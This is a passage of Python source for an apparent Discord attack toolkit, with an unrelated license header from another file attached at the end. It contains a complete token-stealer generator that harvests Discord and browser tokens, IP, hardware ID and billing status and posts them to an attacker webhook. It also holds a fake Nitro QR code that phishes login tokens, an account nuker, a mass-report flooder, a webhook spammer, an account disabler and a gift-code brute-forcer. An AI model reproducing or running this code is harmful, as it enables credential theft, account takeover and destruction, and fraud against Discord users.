await self.Menu()
elif choicenuker == 'exit':
print()
main()
elif choicenuker == 'help':
print(f"""\n\tTool Command\tDescription\n\t------------\t-----------\n\tban\t\tBan Members\n\tkick\t\tKick Members\n\tprune\t\tPrune Members\n\tdelroles\tDelete Roles\n\tdelchannels\tDelete Channels\n\tcroles\t\tCreate Roles\n\tcchannels\tCreate Channels\n\tnuke\t\tNuke Server\n\tscrape\t\tScrape Info\n\texit\t\tReturn to Daiho Menu\n""")
await Nuker().Menu()
elif choicenuker == 'reset':
reset()
await Nuker().Menu()
else:
print(f"""\tInvalid command\n""")
await Nuker().Menu()
@client.event
async def on_ready():
await Nuker().Menu()
def Startup(self):
try:
if token_type == "user":
client.run(token, bot=False)
elif token_type == "bot":
client.run(token)
except:
print(f"""\t[!] Invalid Token\n""")
main()
startt = Nuker()
startt.Startup()
elif choice == "vidcrash":
try:
with open(f"vidcrash.bat", "w") as file:
file.write("""
@echo off
WHERE ffmpeg
IF %%ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit
set /p filepath= [#] Enter path to video file (or drag and drop the video here):
echo.
set timestamp=1
set /p timestamp= [#] Enter the time when the video should crash (in seconds):
ffprobe -i %%filepath%% -show_entries format=duration -v quiet -of csv="p=0" > tmpfile
set /p duration= < tmpfile
del tmpfile
ping 127.0.0.1 -n 3 > NUL
ffmpeg -i %%filepath%% -ss 0 -t %timestamp% part1.mp4
ffmpeg -i %%filepath%% -ss %timestamp% -t %%duration% part2.mp4
ffmpeg -i part2.mp4 -pix_fmt yuv444p part2_new.mp4
echo file part1.mp4> file_list.txt
echo file part2_new.mp4>> file_list.txt
ping 127.0.0.1 -n 3 > NUL
ffmpeg -f concat -safe 0 -i file_list.txt -codec copy crasher.mp4
del part1.mp4
del part2.mp4
del part2_new.mp4
del file_list.txt
ping 127.0.0.1 -n 3 > NUL
echo [#] Output video created! It is located at "crasher.mp4" """)
except Exception as e:
print(f"""\t\t[!] Error writing file: {e}\n""")
main()
subprocess.call([r'vidcrash.bat'])
os.remove('vidcrash.bat')
main()
elif choice == "massreport":
class massreport:
def __init__(self):
self.GUILD_ID = str(input(f"""\t[+] Enter the ID of the server where the message to be reported is located: """))
self.CHANNEL_ID = str(input(f"""\t[+] Enter the ID of the channel in which the message to be reported is located: """))
self.MESSAGE_ID = str(input(f"""\t[+] Enter the ID of the message to be reported: """))
print(f"""\n[+] Choose the reason for the report: """)
print(f"""\t [1] Illegal content""")
print(f"""\t [2] Harassment""")
print(f"""\t [3] Spam or phishing links""")
print(f"""\t [4] Self-harm""")
print(f"""\t [5] NSFW content\n""")
REASON = input(f"""\t[#] Choice: """)
if REASON == '1':
self.REASON = 0
elif REASON == '2':
self.REASON = 1
elif REASON == '3':
self.REASON = 2
elif REASON == '4':
self.REASON = 3
elif REASON == '5':
self.REASON = 4
else:
print(f"""\t[!] Your request is invalid !\n""")
main()
self.RESPONSES = {f"""
\t\t[!] 401: Unauthorized: [!] Invalid Discord token,
\t\t[!] Missing Access: [!] Missing access to channel or guild,
\t\t[!] You need to verify your account in order to perform this action: [!] Unverified"""}
self.sent = 0
self.errors = 0
def _reporter(self):
report = requests.post(
'https://discordapp.com/api/v8/report', json={
'channel_id': self.CHANNEL_ID,
'message_id': self.MESSAGE_ID,
'guild_id': self.GUILD_ID,
'reason': self.REASON
}, headers={
'Accept': '*/*',
'Accept-Encoding': 'gzip, deflate',
'Accept-Language': 'sv-SE',
'User-Agent': 'Discord/21295 CFNetwork/1128.0.1 Darwin/19.6.0',
'Content-Type': 'application/json',
'Authorization': self.TOKEN
}
)
if (status := report.status_code) == 201:
self.sent += 1
print(f"""\t\t[!] Reported successfully""")
elif status in (401, 403):
self.errors += 1
print(self.RESPONSES[report.json()['message']])
else:
self.errors += 1
print(f"""\t\t[!] Error: {report.text} | Status Code: {status}""")
def _multi_threading(self):
while True:
if threading.active_count() <= 300:
time.sleep(1)
threading.Thread(target=self._reporter).start()
def setup(self):
recognized = None
if os.path.exists(config_json := 'Config.json'):
with open(config_json, 'r') as f:
try:
data = json.load(f)
self.TOKEN = data['discordToken']
except (KeyError, json.decoder.JSONDecodeError):
recognized = False
else:
recognized = True
else:
recognized = False
if not recognized:
self.TOKEN = usertoken
with open(config_json, 'w') as f:
json.dump({'discordToken': self.TOKEN}, f)
print()
self._multi_threading()
mr = massreport()
mr.setup()
elif choice == "wspam":
webhook = input(f"""\t[+] Webhooks url for spam: """)
message = input(f"""\t[+] Message to Spam: """)
timer = input(f"""\t[+] Amount of time for the attack (s): """)
try:
timeout = time.time() + 1 * float(timer) + 2
while time.time() < timeout:
response = requests.post(
webhook,
json = {"content" : message},
params = {'wait' : True}
)
os.system('cls' if os.name == 'nt' else 'clear')
time.sleep(1)
if response.status_code == 204 or response.status_code == 200:
print(f"""\t\t[!] Message sent""")
elif response.status_code == 429:
print(f"""\t\t[!] Rate limited ({response.json()['retry_after']}ms)""")
time.sleep(response.json()["retry_after"] / 1000)
else:
print(f"""\t\t[!] Error code: {response.status_code}""")
except:
print(f"""\t[!] Your request is invalid !\n""")
main()
elif choice == "filegrab":
global filename, webhooklink
fileName = input(f"""\t[+] Enter the name you want to give to the final file: """)
webhooklink = input(f"""\t[+] Enter your WebHook to generate a Token Grabber containing it: """)
try:
with open(f"{fileName}.py", "w") as file:
file.write("""import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\\\Discord",
"Discord Canary" : ROAMING + "\\\\discordcanary",
"Discord PTB" : ROAMING + "\\\\discordptb",
"Google Chrome" : LOCAL + "\\\\Google\\\\Chrome\\\\User Data\\\\Default",
"Opera" : ROAMING + "\\\\Opera Software\\\\Opera Stable",
"Brave" : LOCAL + "\\\\BraveSoftware\\\\Brave-Browser\\\\User Data\\\\Default",
"Yandex" : LOCAL + "\\\\Yandex\\\\YandexBrowser\\\\User Data\\\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\\\Local Storage\\\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\\n")[1]
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def main():
cache_path = ROAMING + "\\\\.cache~$"
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\\nPhone: {phone}\\nNitro: {nitro}\\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\\nUsername: {pc_username}\\nPC Name: {pc_name}\\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Discord Token Grabber",
"avatar_url": "https://discordapp.com/assets/5ccabf62108d5a8074ddd95af2211727.png"
}
try:
urlopen(Request("~~TOKENURLHERE~~", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
main()""".replace("~~TOKENURLHERE~~", webhooklink))
except Exception as e:
print(f"""\t\t[!] Error writing file: {e}\n""")
main()
print(f"""\t[#] File has been correctly written to "{fileName}.py"\n""")
convert = input(f"""\n\t[+] Convert your script into an executable (Yes | No) ? """).lower()
if convert == 'yes':
try:
os.system(f"pyinstaller -y -F {fileName}.py")
os.remove(f"{fileName}.spec")
shutil.rmtree(f"build")
shutil.rmtree(f"__pycache__")
print(f"""\n\t[#] The executable file has been correctly generated. Look in "dist" folder\n""")
except Exception as e:
print(f"\t\t[!] Error: {e}")
else:
print()
main()
elif choice == "imggrab":
print(f"""\tNon-operational...\n""")
main()
elif choice == "qrgen":
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'additional/chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = div.find('img')['src']
file = os.path.join(os.getcwd(), 'additional/qr_code.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file,'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
bg = Image.open('additional/back.png')
qrcode = Image.open('additional/qr_code.png')
qrcode = qrcode.resize(size=(127, 127))
bg.paste(qrcode, (87, 313))
discord = Image.open('additional/discord.png')
discord = discord.resize(size=(40, 40))
bg.paste(discord, (130, 355), discord)
bg.save('NitroGift.png')
print(f"""\t[#] QR Code has been generated - [Image: "NitroGift.png"]""")
while True:
if discord_login != driver.current_url:
token = driver.execute_script('''
var req = webpackJsonp.push([
[], {
extra_id: (e, t, r) => e.exports = r
},
[
["extra_id"]
]
]);
for (let e in req.c)
if (req.c.hasOwnProperty(e)) {
let t = req.c[e].exports;
if (t && t.__esModule && t.default)
for (let e in t.default) "getToken" === e && (token = t.default.getToken())
}
return token;
''')
print(f"""\n\t[#] A token has been found: {token}""")
break
print(f"""\t[!] The FakeNitro has been scanned - Token successfully grabbed\n""")
main()
elif choice == "ipgrab":
print(f"""\tNon-operational...\n""")
main()
elif choice == "accnuker":
def nuke(usertoken, Server_Name, message_Content):
print(f"\t[#] Daiho Nuke Deployed")
if threading.active_count() <= 100:
t = threading.Thread(target=CustomSeizure, args=(usertoken, ))
t.start()
headers = {'Authorization': usertoken}
channelIds = requests.get("https://discord.com/api/v9/users/@me/channels", headers=getheaders(usertoken)).json()
for channel in channelIds:
try:
requests.post(f'https://discord.com/api/v9/channels/'+channel['id']+'/messages',
headers=headers,
data={"content": f"{message_Content}"})
print(f"\t\t[!] Messaged ID: "+channel['id'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Sent a Message to all available friends")
guildsIds = requests.get("https://discord.com/api/v7/users/@me/guilds", headers=getheaders(usertoken)).json()
for guild in guildsIds:
try:
requests.delete(
f'https://discord.com/api/v7/users/@me/guilds/'+guild['id'],
headers=getheaders(usertoken))
print(f"\t\t[!] Left guild: "+guild['name'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
for guild in guildsIds:
try:
requests.delete(f'https://discord.com/api/v7/guilds/'+guild['id'], headers=getheaders(usertoken))
print(f'\t\t[!] Deleted guild: '+guild['name'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Deleted/Left all available guilds")
friendIds = requests.get("https://discord.com/api/v9/users/@me/relationships", headers=getheaders(usertoken)).json()
for friend in friendIds:
try:
requests.delete(
f'https://discord.com/api/v9/users/@me/relationships/'+friend['id'], headers=getheaders(usertoken))
print(f"\t\t[!] Removed friend: "+friend['user']['username']+"#"+friend['user']['discriminator'])
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Removed all available friends")
for i in range(100):
try:
payload = {'name': f'{Server_Name}', 'region': 'europe', 'icon': None, 'channels': None}
requests.post('https://discord.com/api/v7/guilds', headers=getheaders(usertoken), json=payload)
print(f"\t\t[!] Created {Server_Name} #{i}")
except Exception as e:
print(f"\t\t[!] The following error has been encountered and is being ignored: {e}")
print(f"\t[#] Created all servers")
t.do_run = False
setting = {
'theme': "light",
'locale': "ja",
'message_display_compact': False,
'inline_embed_media': False,
'inline_attachment_media': False,
'gif_auto_play': False,
'render_embeds': False,
'render_reactions': False,
'animate_emoji': False,
'convert_emoticons': False,
'enable_tts_command': False,
'explicit_content_filter': '0',
'status': "idle"
}
requests.patch("https://discord.com/api/v7/users/@me/settings", headers=getheaders(usertoken), json=setting)
j = requests.get("https://discordapp.com/api/v9/users/@me", headers=getheaders(usertoken)).json()
a = j['username'] + "#" + j['discriminator']
print(f"\n\t[#] Succesfully turned {a} into a holl\n")
main()
def CustomSeizure(token):
print(f'\t[#] Starting seizure mode (Switching on/off Light/dark mode)')
t = threading.currentThread()
while getattr(t, "do_run", True):
modes = cycle(["light", "dark"])
setting = {'theme': next(modes), 'locale': random.choice(['ja', 'zh-TW', 'ko', 'zh-CN'])}
requests.patch("https://discord.com/api/v7/users/@me/settings", headers=getheaders(usertoken), json=setting)
Server_Name = str(input(
f'\t[+] Name of the servers that will be created: '))
message_Content = str(input(
f'\t[+] Message that will be sent to every friend: '))
r = requests.get(
'https://discord.com/api/v9/users/@me',
headers=getheaders(usertoken))
threads = 100
if threading.active_count() < threads:
threading.Thread(target=nuke, args=(usertoken, Server_Name, message_Content)).start()
return
elif choice == "dacc":
sure = input("\t[#] Are you sure you want to permanently Disable this account (Yes | No) ? ").lower()
if sure == "yes":
res = requests.patch('https://discordapp.com/api/v9/users/@me', headers=getheaders(usertoken), json={'date_of_birth': '2020-1-11'})
if res.status_code == 400:
res_message = res.json().get('date_of_birth', ['no response message'])[0]
if res_message == "You need to be 13 or older in order to use Discord.":
print(f'\t[!] Token successfully disabled\n')
elif res_message == "You cannot update your date of birth.":
print(f'\t[!] Account can\'t be disabled\n')
else:
print(f'\t[!] Unknown response: {res_message}\n')
else:
print('\t[!] Failed to disable account\n')
main()
elif choice == "info":
headers = {
'Authorization': usertoken,
'Content-Type': 'application/json'
}
languages = {
'da' : 'Danish, Denmark',
'de' : 'German, Germany',
'en-GB' : 'English, United Kingdom',
'en-US' : 'English, United States',
'es-ES' : 'Spanish, Spain',
'fr' : 'French, France',
'hr' : 'Croatian, Croatia',
'lt' : 'Lithuanian, Lithuania',
'hu' : 'Hungarian, Hungary',
'nl' : 'Dutch, Netherlands',
'no' : 'Norwegian, Norway',
'pl' : 'Polish, Poland',
'pt-BR' : 'Portuguese, Brazilian, Brazil',
'ro' : 'Romanian, Romania',
'fi' : 'Finnish, Finland',
'sv-SE' : 'Swedish, Sweden',
'vi' : 'Vietnamese, Vietnam',
'tr' : 'Turkish, Turkey',
'cs' : 'Czech, Czechia, Czech Republic',
'el' : 'Greek, Greece',
'bg' : 'Bulgarian, Bulgaria',
'ru' : 'Russian, Russia',
'uk' : 'Ukranian, Ukraine',
'th' : 'Thai, Thailand',
'zh-CN' : 'Chinese, China',
'ja' : 'Japanese',
'zh-TW' : 'Chinese, Taiwan',
'ko' : 'Korean, Korea'
}
cc_digits = {
'american express': '3',
'visa': '4',
'mastercard': '5'
}
res = requests.get('https://discordapp.com/api/v6/users/@me', headers=headers)
if res.status_code == 200:
res_json = res.json()
user_name = f'{res_json["username"]}#{res_json["discriminator"]}'
user_id = res_json['id']
avatar_id = res_json['avatar']
avatar_url = f'https://cdn.discordapp.com/avatars/{user_id}/{avatar_id}.gif'
phone_number = res_json['phone']
email = res_json['email']
mfa_enabled = res_json['mfa_enabled']
flags = res_json['flags']
locale = res_json['locale']
verified = res_json['verified']
language = languages.get(locale)
creation_date = datetime.utcfromtimestamp(((int(user_id) >> 22) + 1420070400000) / 1000).strftime('%d-%m-%Y %H:%M:%S UTC')
has_nitro = False
res = requests.get('https://discordapp.com/api/v6/users/@me/billing/subscriptions', headers=headers)
nitro_data = res.json()
has_nitro = bool(len(nitro_data) > 0)
if has_nitro:
d1 = datetime.strptime(nitro_data[0]["current_period_end"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
d2 = datetime.strptime(nitro_data[0]["current_period_start"].split('.')[0], "%Y-%m-%dT%H:%M:%S")
days_left = abs((d2 - d1).days)
billing_info = []
for x in requests.get('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers=headers).json():
yy = x['billing_address']
name = yy['name']
address_1 = yy['line_1']
address_2 = yy['line_2']
city = yy['city']
postal_code = yy['postal_code']
state = yy['state']
country = yy['country']
if x['type'] == 1:
cc_brand = x['brand']
cc_first = cc_digits.get(cc_brand)
cc_last = x['last_4']
cc_month = str(x['expires_month'])
cc_year = str(x['expires_year'])
data = {
'Payment Type': 'Credit Card',
'Valid': not x['invalid'],
'CC Holder Name': name,
'CC Brand': cc_brand.title(),
'CC Number': ''.join(z if (i + 1) % 2 else z + ' ' for i, z in enumerate((cc_first if cc_first else '*') + ('*' * 11) + cc_last)),
'CC Exp. Date': ('0' + cc_month if len(cc_month) < 2 else cc_month) + '/' + cc_year[2:4],
'Address 1': address_1,
'Address 2': address_2 if address_2 else '',
'City': city,
'Postal Code': postal_code,
'State': state if state else '',
'Country': country,
'Default Payment Method': x['default']
}
elif x['type'] == 2:
data = {
'Payment Type': 'PayPal',
'Valid': not x['invalid'],
'PayPal Name': name,
'PayPal Email': x['email'],
'Address 1': address_1,
'Address 2': address_2 if address_2 else '',
'City': city,
'Postal Code': postal_code,
'State': state if state else '',
'Country': country,
'Default Payment Method': x['default']
}
billing_info.append(data)
print(f"""\t[#] Basic Information:""")
print(f"""\t\t[+] Username: {user_name}""")
print(f"""\t\t[+] User ID: {user_id}""")
print(f"""\t\t[+] Creation Date: {creation_date}""")
print(f"""\t\t[+] Avatar URL: {avatar_url if avatar_id else ""}""")
print(f"""\t\t[+] Token: {usertoken}""")
print(f"""\n\t[#] Nitro Information:""")
print(f"""\t\t[+] Nitro Status: {has_nitro}""")
if has_nitro:
print(f"""\t\t[+] Expires in: {days_left} day(s)""")
else:
print(f"""\t\t[+] Expires in: None day(s)""")
print(f"""\n\t[#] Contact Information:""")
print(f"""\t\t[+] Phone Number: {phone_number if phone_number else ""}""")
print(f"""\t\t[+] Email: {email if email else ""}""")
if len(billing_info) > 0:
print(f"""\n\t[#] Billing Information:""")
if len(billing_info) == 1:
for x in billing_info:
for key, val in x.items():
if not val:
continue
print('\t\t[+] {:<23}{}{}'.format(key, "", val))
else:
for i, x in enumerate(billing_info):
title = f'\n\t[#] Payment Method #{i + 1} ({x["Payment Type"]})'
print(' ' + title)
print(' ' + ('=' * len(title)))
for j, (key, val) in enumerate(x.items()):
if not val or j == 0:
continue
print('\t\t[+] {:<23}{}{}'.format(key, "", val))
if i < len(billing_info) - 1:
print('\n')
print(f"""\n\t[#] Account Security:""")
print(f"""\t\t[+] 2FA/MFA Enabled: {mfa_enabled}""")
print(f"""\t\t[+] Flags: {flags}""")
print(f"""\n\t[#] Other:""")
print(f"""\t\t[+] Locale: {locale} ({language})""")
print(f"""\t\t[+] Email Verified: {verified}\n""")
elif res.status_code == 401:
print(f"""\n\t[#] Invalid token\n""")
else:
print(f"""\n\t[#] An error occurred while sending request\n""")
main()
elif choice == "autolog":
print()
driver = webdriver.Chrome(executable_path=r'additional/chromedriver.exe')
driver.maximize_window()
driver.get('https://discord.com/login')
js = 'function login(token) {setInterval(() => {document.body.appendChild(document.createElement `iframe`).contentWindow.localStorage.token = `"${token}"`}, 50);setTimeout(() => {location.reload();}, 500);}'
time.sleep(3)
driver.execute_script(js + f'login("{usertoken}")')
time.sleep(10)
if driver.current_url == 'https://discord.com/login':
print(f"""\t[!] Connection Failed\n""")
driver.close()
else:
print(f"""\t[!] Connection Established\n""")
main()
elif choice == "nitrogen":
class NitroGen:
def __init__(self):
self.fileName = "NitroCodes.txt"
def main(self):
num = int(input(f"""\t[+] Input How Many Codes to Generate and Check: """))
url = input(f"""\t[+] Do you wish to use a discord webhook? - [If so type it here or press enter to ignore] """)
webhook = url if url != "" else None
valid = []
invalid = 0
for i in range(num):
try:
code = "".join(random.choices(
string.ascii_uppercase + string.digits + string.ascii_lowercase,
k = 16
))
url = f"https://discord.gift/{code}"
result = self.quickChecker(url, webhook)
if result:
valid.append(url)
else:
invalid += 1
except Exception as e:
print(f"\t\t[!] Error : {url}")
print(f"""
\t[+] Results:
\t [!] Valid: {len(valid)}
\t [!] Invalid: {invalid}
\t [!] Valid Codes: {', '.join(valid )}\n""")
main()
def generator(self, amount):
with open(self.fileName, "w", encoding="utf-8") as file:
print(f"\t[#] Wait, Generating for you")
start = time.time()
for i in range(amount):
code = "".join(random.choices(
string.ascii_uppercase + string.digits + string.ascii_lowercase,
k = 16
))
file.write(f"https://discord.gift/{code}\n")
print(f"\tGenned {amount} codes | Time taken: {round(time.time() - start, 5)}s\n") #
def fileChecker(self, notify = None):
valid = []
invalid = 0
with open(self.fileName, "r", encoding="utf-8") as file:
for line in file.readlines():
nitro = line.strip("\n")
url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
response = requests.get(url)
if response.status_code == 200:
print(f"\t\t[!] VALID NITRO: {nitro}")
valid.append(nitro)
if notify is not None:
DiscordWebhook(
url = notify,
content = f"@everyone | A valid Nitro has been found => {nitro}"
).execute()
else:
break
else:
print(f"\t\t[!] INVALID NITRO: {nitro}")
invalid += 1
return {"valid" : valid, "invalid" : invalid}
def quickChecker(self, nitro, notify = None):
url = f"https://discordapp.com/api/v9/entitlements/gift-codes/{nitro}?with_application=false&with_subscription_plan=true"
response = requests.get(url)
if response.status_code == 200:
print(f"\t\t[!] VALID NITRO: {nitro}", flush=True)
with open("NitroCodes.txt", "w") as file:
file.write(nitro)
if notify is not None:
DiscordWebhook(
url = notify,
content = f"@everyone | A valid Nitro has been found => {nitro}"
).execute()
return True
else:
print(f"\t\t[!] INVALID NITRO: {nitro}", flush=True)
return False
Gen = NitroGen()
Gen.main()
elif choice == "nsniper":
data = {}
bot = commands.Bot(command_prefix=".", self_bot=True)
global ready
ready = False
codeRegex = re.compile("(discord.com/gifts/|discordapp.com/gifts/|discord.gift/)([a-zA-Z0-9]+)")
while 1:
try:
@bot.event
async def on_message(ctx):
global ready
if not ready:
print(f"""\t[#] Sniping Discord Nitro and Giveaway on {str(len(bot.guilds))} Servers""")
print("\t[#] Bot is ready\n")
ready = True
if codeRegex.search(ctx.content):
code = codeRegex.search(ctx.content).group(2)
start_time = time.time()
if len(code) < 16:
try:
print(f"""\t\t[#] Auto-detected a fake code: {code} From {ctx.author.name}#{ctx.author.discriminator} [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t\t[#] Auto-detected a fake code: {code} From {ctx.author.name}#{ctx.author.discriminator}""")
else:
async with httpx.AsyncClient() as client:
result = await client.post('https://discordapp.com/api/v6/entitlements/gift-codes/' + code + '/redeem',json={'channel_id': str(ctx.channel.id)},headers={'authorization': usertoken, 'user-agent': 'Mozilla/5.0'})
delay = (time.time() - start_time)
try:
print(f"""\t\t[#] Sniped code: {code} From {ctx.author.name}#{ctx.author.discriminator} [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t\t[#] Sniped code: {code} From {ctx.author.name}#{ctx.author.discriminator}""")
if 'This gift has been redeemed already' in str(result.content):
print("\t\t[#] Code has been already redeemed", end='')
elif 'nitro' in str(result.content):
print("\t\t[#] Code applied", end='')
elif 'Unknown Gift Code' in str(result.content):
print("\t\t[#] Invalid Code", end='')
print(" Delay:" + " %.3fs" % delay)
elif (('**giveaway**' in str(ctx.content).lower() or ('react with' in str(ctx.content).lower() and 'giveaway' in str(ctx.content).lower()))):
try:
await asyncio.sleep(randint(100, 200))
await ctx.add_reaction("🎉")
print(f"""\t[#] Enter Giveaway [{ctx.guild.name}>{ctx.channel.name}]""")
except:
print(f"""\t[#] Failed to enter Giveaway [{ctx.guild.name}>{ctx.channel.name}]""")
elif '<@' + str(bot.user.id) + '>' in ctx.content and ('giveaway' in str(ctx.content).lower() or 'won' in ctx.content or 'winner' in str(ctx.content).lower()):
try:
won = re.search("\t[#]You won the \*\*(.*)\*\*", ctx.content).group(1)
except:
won = "UNKNOWN"
print(f"""[#] Congratulations! You won Giveaway: {won} [{ctx.guild.name}>{ctx.channel.name}]""")
bot.run(usertoken, bot=False)
except:
print(f"""\t[!] Error\n""")
main()
elif choice == "cleardm":
prefix = "!"
bot = commands.Bot(command_prefix=prefix, self_bot=True)
bot.remove_command("help")
print(f"""\t[#] Write "!clear" in one of your DMs to delete your messages\n""")
@bot.command()
async def clear(ctx, limit: int=None):
passed = 0
failed = 0
async for msg in ctx.message.channel.history(limit=limit):
if msg.author.id == bot.user.id:
try:
await msg.delete()
passed += 1
except:
failed += 1
print(f"\t[!] Removed {passed} messages with {failed} fails\n")
main()
bot.run(usertoken, bot=False)
elif choice == "housechanger":
house = str(input(f"""\t[#] Which house do you want to be part of: \n\t\t[01] Bravery\n\t\t[02] Brilliance\n\t\t[03] Balance\n\t[+] Enter your House choice: """))
if house == "1" or house == "01":
payload = {'house_id': 1}
elif house == "2" or house == "02":
payload = {'house_id': 2}
elif house == "3" or house == "03":
payload = {'house_id': 3}
else:
print(f"""\t\t[!] Invalid Choice""")
main()
r = requests.post('https://discordapp.com/api/v6/hypesquad/online', headers=getheaders(usertoken), json=payload, timeout=10)
if r.status_code == 204:
print(f""" \t[!] Hypesquad House changed\n""")
main()
else:
print(f"\t[!] Error occured while trying to change the HypeSquad house\n")
main()
elif choice == "schanger":
status = input(f"""\t[#] Choose Custom Status: """)
CustomStatus = {"custom_status": {"text": status}}
try:
r = requests.patch("https://discord.com/api/v9/users/@me/settings", headers=getheaders(usertoken), json=CustomStatus)
print(f"""\t[!] Status changed to "{status}"\n""")
main()
except Exception as e:
print(f"\t[!] Error: {e} Occured while trying to change the status\n")
elif choice == "cycle":
amount = int(input(f"""\t[+] Enter number of cycles: """))
modes = cycle(["light", "dark"])
for i in range(amount):
print(f"""\t\t[{i+1}] Theme Color has been changed""")
time.sleep(0.12)
setting = {'theme': next(modes)}
requests.patch("https://discord.com/api/v8/users/@me/settings", headers=getheaders(usertoken), json=setting)
print(f"""\t[#] Cycle completed\n""")
main()
elif choice == "wremover":
try:
webhook = input(f"""\t[+] WebHook Link to Delete: """)
requests.delete(webhook.rstrip())
print(f"""\t[!] Webhook has been deleted\n""")
main()
except:
print(f"""\t[!] Webhook could not be deleted\n""")
main()
elif choice == "color":
print(f"""\n\tCode Color\tColor Name\n\t----------\t----------\n\tcolor g\t\tGreen\n\tcolor b\t\tBlue\n\tcolor r\t\tRed\n\tcolor p\t\tPurple\n\tcolor y\t\tYellow\n\tcolor w\t\tWhite\n""")
main()
elif choice == "color g":
os.system('color a')
print()
main()
elif choice == "color b":
os.system('color b')
print()
main()
elif choice == "color r":
os.system('color c')
print()
main()
elif choice == "color p":
os.system('color d')
print()
main()
elif choice == "color y":
os.system('color e')
print()
main()
elif choice == "color w":
os.system('color f')
print()
main()
elif choice == "reset":
reset()
main()
elif choice == "help":
print(f"""\n\tCommand\t\tDescription\n\t-------\t\t------------\n\ttools\t\tList the different tools\n\tcolor\t\tChange color theme\n\treset\t\tReset the page\n\thelp\t\tShow help menu\n\texit\t\tClose Rage\n""")
main()
elif choice == "exit":
sys.exit()
else:
print(f"""\tInvalid command\n\tWrite "help" to see the available commands\n""")
main()
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
title()
login() |
system_test.py | '''
Copyright (c) 2019, Arm Limited and Contributors
SPDX-License-Identifier: Apache-2.0
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
